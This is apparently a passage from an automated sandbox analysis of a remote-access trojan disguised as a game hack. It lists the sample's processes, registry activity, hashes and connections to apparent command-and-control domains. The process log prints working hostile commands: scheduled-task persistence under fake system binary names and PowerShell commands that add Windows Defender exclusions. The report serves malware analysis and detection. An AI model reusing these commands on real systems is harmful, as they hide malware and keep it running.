| File created | C:\Windows\security\conhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Windows\security\088424020bedd6 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Windows\uk-UA\fontdrvhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Windows\uk-UA\5b884080fd4f94 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe
"C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic diskdrive get model,serialnumber
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_Keyboard get Description,DeviceID
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_PointingDevice get Description,PNPDeviceID
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_PointingDevice get Description,PNPDeviceID
C:\Windows\System32\Wbem\wmic.exe
wmic path Win32_DesktopMonitor get Description,PNPDeviceID
C:\Windows\System32\Wbem\wmic.exe
wmic get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
"C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\upfc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\igghsuce\igghsuce.cmdline"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Templates\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\Templates\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Templates\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\security\conhost.exe'" /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA86.tmp" "c:\Windows\System32\CSCD8D644E09FC241AA8996A8F16E59FB8.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\security\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\security\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Windows\uk-UA\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Security\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MpDefenderCoreProtionM" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MpDefenderCoreProtion" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MpDefenderCoreProtionM" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\upfc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\uk-UA\fontdrvhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\OfficeClickToRun.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\cmd.exe'
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
C:\Recovery\WindowsRE\OfficeClickToRun.exe
"C:\Recovery\WindowsRE\OfficeClickToRun.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\runtimesvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvc" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\taskhostw.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\runtimesvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k0tbFJWvqp.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25350.client.sudorat.top | udp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| N/A | 127.0.0.1:1111 | tcp | |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| FR | 37.44.238.250:80 | 729231cm.n9shteam1.top | tcp |
| US | 8.8.8.8:53 | 250.238.44.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117813cm.n9shteam.in | udp |
| FR | 37.44.238.250:80 | 117813cm.n9shteam.in | tcp |
| RU | 31.44.184.52:25350 | tcp | |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| US | 8.8.8.8:53 | 200.254.1.23.in-addr.arpa | udp |
| RU | 31.44.184.52:25350 | tcp | |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| US | 8.8.8.8:53 | 179.254.1.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| RU | 31.44.184.52:25350 | tcp | |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| RU | 31.44.184.52:25350 | tcp |
Files
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
| MD5 | 10e817a4d5e216279a8de8ed71c91044 |
| SHA1 | 97c6fb42791be24d12bd74819ef67fa8f3d21724 |
| SHA256 | c60f74f6e164049e683a5f01b8cfea24aa85cbf6c7b31b765cbad16d8ab0d7b2 |
| SHA512 | 34421a517f5f1909afd694d24e22cafad9930725df964ba9c80666e9f0f2dcfdd2a254dcf6699e5797296ec3ae611593563779df05e3a617c7f8679a154dfd37 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe
| MD5 | a05e26d89c5be7e2c6408b09cd05cf74 |
| SHA1 | c24231c6301f499b35441615b63db6969a1762fd |
| SHA256 | 05628dfff22e15b219a711cf52a2c87521170853979f00fcd014cf164656418e |
| SHA512 | 8c8733f12dd71cfafd2edbfad487279d6ed971eb119b1cde92a905f4658a9b090f831f42ef2228a4f6c64071a1f54fb74708438b4361e317e36016897577913d |
